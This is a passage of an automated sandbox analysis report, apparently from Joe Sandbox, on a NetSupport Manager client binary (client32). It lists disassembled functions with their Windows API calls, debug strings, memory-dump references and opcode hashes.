                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                                                    • String ID: NSMClassList
                                                                                                                                    • API String ID: 2883182437-2474587545
                                                                                                                                    • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                    • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                                                    • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                    • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                    • API String ID: 104907563-3240211118
                                                                                                                                    • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                                                                    • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                                                                    • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                                                                    • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115E750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • BringWindowToTop.USER32(?), ref: 1115E78C
                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 1115E7A5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Bring
                                                                                                                                    • String ID: MMPlayer$MMPlayerOnTop
                                                                                                                                    • API String ID: 3868984299-4271085576
                                                                                                                                    • Opcode ID: 3e382b708fe909db06f4932db0ee17b2fcd66f2f34df42ca60b2692d432055e2
                                                                                                                                    • Instruction ID: 8916c069bb06823c575daa700f01655229a7ee1682237ba16ad4f0d17eb11653
                                                                                                                                    • Opcode Fuzzy Hash: 3e382b708fe909db06f4932db0ee17b2fcd66f2f34df42ca60b2692d432055e2
                                                                                                                                    • Instruction Fuzzy Hash: 82016238780711BBE7708B74CD45F96F2A4AB48F21F300A18B3B6AB6C4C6B4B440C758
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11146190 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                      • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                      • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                      • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                      • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 111461A9
                                                                                                                                    • LoadBitmapA.USER32 ref: 111461BF
                                                                                                                                    • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 111461FB
                                                                                                                                    Strings
                                                                                                                                    • hGrip || !"Unable to load sizing grip bitmap", xrefs: 111461DE
                                                                                                                                    • ..\ctl32\util.cpp, xrefs: 111461D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion
                                                                                                                                    • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                                                                                    • API String ID: 1574555497-3315463184
                                                                                                                                    • Opcode ID: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                                                                                    • Instruction ID: 8e565c128ad7df1c8f5e5c04fb88379ac646e9871c4513a0e4d424585abd715b
                                                                                                                                    • Opcode Fuzzy Hash: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                                                                                    • Instruction Fuzzy Hash: 0DF0BB79A4032577E61456F19D05FEBBA5C9B44F5DF004430FE19A7A82DE78D900C3E5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11004210 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowsleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(?,0000060C,00000002,00000000), ref: 1100422E
                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 11004236
                                                                                                                                    • SendMessageA.USER32(?,0000060C,00000003,00000000), ref: 11004249
                                                                                                                                    Strings
                                                                                                                                    • m_pToolbar, xrefs: 1100425F
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 1100425A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Sleep
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                                                                                    • API String ID: 2158920685-281161189
                                                                                                                                    • Opcode ID: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                                                                                    • Instruction ID: e130d243a18c05c63e38ab9a554661a07bf0098fc6b996864d1fadb4c15248a9
                                                                                                                                    • Opcode Fuzzy Hash: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                                                                                    • Instruction Fuzzy Hash: B4F0A435B80710AFE228EBA0DC45F47B3E6BBC8704F014214F6119B691D770A901CB44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11146140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                      • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                      • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                      • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                      • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                    • LoadLibraryA.KERNEL32(gdi32.dll,?,762E17C0,?,11003D52,00000000,00000008), ref: 11146155
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11146167
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,11003D52,00000000,00000008), ref: 1114617E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion
                                                                                                                                    • String ID: SetLayout$gdi32.dll
                                                                                                                                    • API String ID: 952012225-836973393
                                                                                                                                    • Opcode ID: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                                                                                    • Instruction ID: d41aa01a6e476ec3efb0e30ba4a4f3b24d6e29c0e630937b51d8ced853034778
                                                                                                                                    • Opcode Fuzzy Hash: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                                                                                    • Instruction Fuzzy Hash: B9E0E536300129A7A7041BA6AD449AEBB6CDFC4D6E7110032FD28C3E00DF30D80286B1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindWindowA.USER32 ref: 11017428
                                                                                                                                    • GetWindowLongA.USER32 ref: 11017437
                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                    • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                    • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                                                    • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                    • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111B5D0 Relevance: 7.6, APIs: 5, Instructions: 116windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 1111B613
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B677
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B69F
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B6CD
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B6F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectStock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3428563643-0
                                                                                                                                    • Opcode ID: dbca20f1f5f7623a4ab8e673b8f0406da72958bd17ed11048a27d3daf01fbb7b
                                                                                                                                    • Instruction ID: 92b8e22ea7e4688bb1be41d709802a1928e2f32718a1b5f8dbc669fb6f1dc32a
                                                                                                                                    • Opcode Fuzzy Hash: dbca20f1f5f7623a4ab8e673b8f0406da72958bd17ed11048a27d3daf01fbb7b
                                                                                                                                    • Instruction Fuzzy Hash: 554195B5A11219BFDB04CAA8D985EAFF7BDFB8C614F104229F915A3244D670BD008BB4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116E505 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                                                    • DecodePointer.KERNEL32(111DD298,00000020,1116E656,?,00000001,00000000,?,1116E687,000000FF,?,111745C6,00000011,?,?,1116C592,0000000D), ref: 1116E54F
                                                                                                                                    • DecodePointer.KERNEL32(?,1116E687,000000FF,?,111745C6,00000011,?,?,1116C592,0000000D), ref: 1116E560
                                                                                                                                      • Part of subcall function 1116C488: RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A
                                                                                                                                    • DecodePointer.KERNEL32(-00000004,?,1116E687,000000FF,?,111745C6,00000011,?,?,1116C592,0000000D), ref: 1116E586
                                                                                                                                    • DecodePointer.KERNEL32(?,1116E687,000000FF,?,111745C6,00000011,?,?,1116C592,0000000D), ref: 1116E599
                                                                                                                                    • DecodePointer.KERNEL32(?,1116E687,000000FF,?,111745C6,00000011,?,?,1116C592,0000000D), ref: 1116E5A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2427772772-0
                                                                                                                                    • Opcode ID: 8383cc9bd081b4bf10bc360bbddfd3c02746937bacdf32d83193e20ffb9e0ea2
                                                                                                                                    • Instruction ID: 89215106bf2c4fb98c9e4be4952ac5997f9215d62d623682360bdd71949eef12
                                                                                                                                    • Opcode Fuzzy Hash: 8383cc9bd081b4bf10bc360bbddfd3c02746937bacdf32d83193e20ffb9e0ea2
                                                                                                                                    • Instruction Fuzzy Hash: 04314C74D0232ADFDF00DFA4C99429DFBB9BB48318F50822AD411A7250EBB69965CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,20F29797,?,?,?,20F29797), ref: 110CEE2A
                                                                                                                                      • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000,?,?,?,20F29797), ref: 110CEE92
                                                                                                                                    • IsWindow.USER32(?), ref: 110CF82B
                                                                                                                                      • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                                                                    • RemovePropA.USER32 ref: 110CF858
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF876
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF880
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
